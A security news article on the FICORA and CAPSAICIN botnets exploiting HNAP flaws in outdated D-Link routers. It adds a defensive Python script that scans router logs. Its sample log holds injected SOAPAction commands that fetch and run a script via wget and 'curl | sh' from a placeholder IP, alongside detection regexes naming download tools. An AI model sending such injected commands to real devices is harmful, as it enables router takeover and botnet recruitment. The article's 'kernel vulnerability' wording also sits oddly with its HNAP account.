
New Botnet Exploiting D-Link Routers for Remote Control


Recent research has pointed out a concerning increase in cyber activity related to the “FICORA” and “CAPSAICIN” botnets, unleashed by hackers to exploit known vulnerabilities in D-Link routers, particularly those running outdated firmware like DIR-645, DIR-806, GO-RT-AC750, and DIR-845L.

The attackers are taking advantage of the HNAP protocol to remotely execute malicious commands on vulnerable devices. This exploitation method has been around for years but continues to be effective due to the prevalence of unpatched systems, underscoring the importance of timely firmware updates and robust security measures to counter these persistent threats.

Operating from servers based in the Netherlands, the cybercriminals behind the “FICORA” botnet have launched a wide-ranging attack impacting numerous countries globally. This indiscriminate assault indicates that the hackers’ intentions were not limited to specific targets, raising concerns about the scale and reach of these malicious activities.

In contrast to the broad scope of the “FICORA” campaign, the “CAPSAICIN” botnet has been more selective in its targets, with a concentrated offensive observed in East Asian regions on October 21st and 22nd, 2024.

The “FICORA” botnet, classified as a Linux malware variant of the infamous Mirai botnet, spreads the FICORA payload using download tools such as wget, ftpget, curl, and tftp. Before downloading the versions built for different Linux architectures, the malware terminates any running processes that share its own file extension. It uses ChaCha20 encryption to protect its configuration, including the C2 server domain and a unique string, and it also carries a hardcoded username and password list for brute-force attacks and a shell script that identifies and halts processes containing the keyword “dvrHelper.”
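The HNAP abuse described above and the download tools named in this paragraph give a defender two simple things to look for in router-facing HTTP logs. The script below is an added example, not code from FortiGuard Labs or the article; it assumes a constructed proxy/WAF log format with the SOAPAction header recorded per request, and flags HNAP requests whose SOAPAction carries shell metacharacters or one of the download helpers the report lists.

```python
import re
from typing import Dict, List

# Constructed sample log lines (not from the report). Assumed format:
# <time> <src> <method> <path> <status> soapaction="<SOAPAction header value>"
# Addresses are documentation ranges (TEST-NET), so nothing here is a real host.
SAMPLE_LOG = """\
2024-10-21T10:01:02Z 203.0.113.10 POST /HNAP1/ 200 soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings"
2024-10-21T10:01:05Z 203.0.113.11 POST /HNAP1/ 200 soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings/`wget http://198.51.100.7/bot.sh`"
2024-10-21T10:01:09Z 203.0.113.12 POST /HNAP1/ 200 soapaction="http://purenetworks.com/HNAP1/Login; curl 198.51.100.7/x | sh"
2024-10-21T10:02:00Z 203.0.113.13 GET /index.html 200 soapaction=""
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<path>\S+) '
    r'(?P<status>\d{3}) soapaction="(?P<soap>.*)"$'
)
# A legitimate SOAPAction is a plain URI; shell metacharacters have no place in it.
META_RE = re.compile(r'[;`|&$]')
# Download helpers the report says the botnet uses to fetch its payloads.
TOOL_RE = re.compile(r'\b(wget|curl|tftp|ftpget)\b', re.IGNORECASE)


def classify(line: str) -> Dict:
    """Parse one log line and attach a list of reasons it looks like HNAP abuse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return {}
    rec = m.groupdict()
    reasons = []
    if rec["path"].startswith("/HNAP1"):
        if META_RE.search(rec["soap"]):
            reasons.append("shell metacharacter in SOAPAction")
        if TOOL_RE.search(rec["soap"]):
            reasons.append("download tool in SOAPAction")
    rec["reasons"] = reasons
    return rec


def suspicious(log: str) -> List[Dict]:
    """Return only the parsed records that triggered at least one reason."""
    return [r for r in map(classify, log.splitlines()) if r and r["reasons"]]


if __name__ == "__main__":
    for hit in suspicious(SAMPLE_LOG):
        print(hit["ts"], hit["src"], "; ".join(hit["reasons"]))
```

The first and last sample lines are a normal HNAP call and a non-HNAP request, so only the two injected lines are reported.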

On the other hand, the “CAPSAICIN” malware, believed to be a derivative of botnets developed by the Keksec group, is distributed from a malicious server and targets diverse Linux architectures by connecting with its C2 server to transmit victim host data. This malware can terminate processes associated with rival botnets, set up environment variables, and carry out DDoS attacks as per instructions received from the C2 server.

The research conducted by FortiGuard Labs uncovered that “FICORA” and “CAPSAICIN” exploit an outdated, patched kernel vulnerability dating back a decade, highlighting the enduring menace posed by unpatched systems. Despite the antiquity of this vulnerability, the attacks exploiting it persist, emphasizing the urgent need for regular kernel updates across enterprise devices. It is crucial for organizations to deploy comprehensive monitoring systems to identify and counter potential malware deployments capitalizing on this and other vulnerabilities.

By taking proactive measures like regular firmware updates, robust security protocols, and continuous monitoring, businesses can significantly reduce their exposure to these ongoing cyber threats, safeguarding their operations and data against malicious intrusions.
